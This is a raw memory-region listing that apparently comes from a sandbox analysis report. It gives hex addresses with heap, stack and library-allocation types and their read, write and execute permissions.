1CBBF849000
heap
page read and write
24FB5F80000
heap
page read and write
169B524B000
trusted library allocation
page read and write
2FA7000
trusted library allocation
page read and write
12D3500B000
trusted library allocation
page read and write
169B6080000
heap
page read and write
1CBBF852000
heap
page read and write
3480000
heap
page read and write
1CA8AC5F000
trusted library allocation
page read and write
1CBBF880000
heap
page read and write
19E8025E000
heap
page read and write
5430000
trusted library allocation
page read and write
4D089FE000
stack
page read and write
27810001000
trusted library allocation
page read and write
24FB5F88000
heap
page read and write
7FFD9B760000
trusted library allocation
page read and write
2FBB000
trusted library allocation
page read and write
1CBBF860000
heap
page read and write
125324DB000
heap
page read and write
257B7D90000
heap
page read and write
12D34ED0000
heap
page read and write
2FAF000
trusted library allocation
page read and write
64622FD000
stack
page read and write
19EE86CA000
trusted library allocation
page read and write
9C8397D000
stack
page read and write
1CA8B5E0000
trusted library allocation
page read and write
27810075000
trusted library allocation
page read and write
7FFD9B780000
trusted library allocation
page read and write
8D5B2FF000
stack
page read and write
161B33CA000
heap
page read and write
328B000
trusted library allocation
page read and write
970000
heap
page read and write
1CBBF879000
heap
page read and write
123B000
stack
page read and write
1CBBF860000
heap
page read and write
7F0000
heap
page read and write
5B78000
unkown
page read and write
382D000
trusted library allocation
page read and write
7FFD9B7A0000
trusted library allocation
page read and write
308D000
trusted library allocation
page read and write
18B0000
heap
page read and write
D77000
trusted library allocation
page execute and read and write
27804496000
trusted library allocation
page read and write
5900000
heap
page read and write
54A0000
heap
page read and write
5490000
heap
page execute and read and write
17FA000
trusted library allocation
page execute and read and write
5AE0000
unkown
page read and write
19EE5CD4000
heap
page read and write
4D07DFE000
stack
page read and write
2BE1000
trusted library allocation
page read and write
1CBBF873000
heap
page read and write
1CA8AB5B000
trusted library allocation
page read and write
4611000
trusted library allocation
page read and write
57DF000
stack
page read and write
3412000
heap
page read and write
7A0000
heap
page read and write
1CBBF863000
heap
page read and write
9C8490E000
stack
page read and write
1CAA2CD5000
heap
page read and write
19EE86C3000
trusted library allocation
page read and write
1CBBF867000
heap
page read and write
1580000
heap
page read and write
1CAA2E20000
heap
page read and write
19EE7BF0000
trusted library allocation
page read and write
B8D000
heap
page read and write
1CBBF873000
heap
page read and write
6461EF9000
stack
page read and write
1CBBF87D000
heap
page read and write
9F99A7E000
stack
page read and write
169B5243000
trusted library allocation
page read and write
3FAD000
trusted library allocation
page read and write
1CBBF871000
heap
page read and write
5CC9000
unkown
page read and write
1CBBF86E000
heap
page read and write
1CBBF860000
heap
page read and write
1CBBF877000
heap
page read and write
125324B2000
heap
page read and write
32CE000
stack
page read and write
3089000
trusted library allocation
page read and write
1CBBF889000
heap
page read and write
1CBBF887000
heap
page read and write
161B3320000
heap
page read and write
1CBBF86B000
heap
page read and write
796000
stack
page read and write
27AF000
stack
page read and write
161B4E74000
heap
page read and write
2B1B000
trusted library allocation
page read and write
161B354B000
heap
page read and write
19EE5C50000
heap
page read and write
7FFD9B650000
trusted library allocation
page execute and read and write
1320000
trusted library allocation
page read and write
300D000
trusted library allocation
page read and write
553A000
heap
page read and write
19EFFE3A000
heap
page read and write
2F8D000
trusted library allocation
page read and write
169B5474000
heap
page read and write
327B000
trusted library allocation
page read and write
1CBBF852000
heap
page read and write
1FD311C9000
heap
page read and write
55DE000
stack
page read and write
1CBBF875000
heap
page read and write
5A00000
unkown
page read and write
1CBBF860000
heap
page read and write
1CBBF7E6000
heap
page read and write
1CBBF85A000
heap
page read and write
278109A1000
trusted library allocation
page read and write
1A20000
heap
page read and write
2FD1000
trusted library allocation
page read and write
17AF000
stack
page read and write
9C837FD000
stack
page read and write
3017000
trusted library allocation
page read and write
7FFD9B730000
trusted library allocation
page read and write
12D35035000
trusted library allocation
page read and write
3015000
trusted library allocation
page read and write
7FFD9B530000
trusted library allocation
page execute and read and write
7FFD9B720000
trusted library allocation
page read and write
17F2000
trusted library allocation
page execute and read and write
1FD312E0000
heap
page read and write
1CA8AC4B000
trusted library allocation
page read and write
3057000
trusted library allocation
page read and write
125324F8000
heap
page read and write
12F6000
stack
page read and write
27812589000
trusted library allocation
page read and write
3021000
trusted library allocation
page read and write
9C847CE000
stack
page read and write
9F997F9000
stack
page read and write
327D000
trusted library allocation
page read and write
53EE000
stack
page read and write
19EE7CB8000
trusted library allocation
page read and write
161B3307000
heap
page read and write
19EFFDBF000
heap
page read and write
9F9A80A000
stack
page read and write
19EE76B0000
trusted library allocation
page read and write
1CBBF873000
heap
page read and write
19EE5CAE000
heap
page read and write
1FD32C74000
heap
page read and write
18AE000
stack
page read and write
27811090000
trusted library allocation
page read and write
169B55E4000
heap
page read and write
3047000
trusted library allocation
page read and write
2FB3000
trusted library allocation
page read and write
2FCB000
trusted library allocation
page read and write
3085000
trusted library allocation
page read and write
1CBBF800000
heap
page read and write
19EE5CD6000
heap
page read and write
3611000
trusted library allocation
page read and write
2B18000
trusted library allocation
page read and write
1CBBF86B000
heap
page read and write
1CBBF860000
heap
page read and write
27811821000
trusted library allocation
page read and write
27811839000
trusted library allocation
page read and write
9E21FFE000
stack
page read and write
302B000
trusted library allocation
page read and write
9C83AF8000
stack
page read and write
D7B000
trusted library allocation
page execute and read and write
4DB0000
heap
page read and write
1CBBF801000
heap
page read and write
145F000
stack
page read and write
27802A02000
trusted library allocation
page read and write
64625FF000
stack
page read and write
1CBBF490000
heap
page read and write
169B5245000
trusted library allocation
page read and write
1CBBF800000
heap
page read and write
1CBBF854000
heap
page read and write
1940000
heap
page execute and read and write
1CA8B68C000
trusted library allocation
page read and write
19EE8704000
trusted library allocation
page read and write
27810647000
trusted library allocation
page read and write
1CBBF87D000
heap
page read and write
1CBBF800000
heap
page read and write
1CBBF873000
heap
page read and write
1CBBF860000
heap
page read and write
There are 1493 hidden memdumps, click here to show them.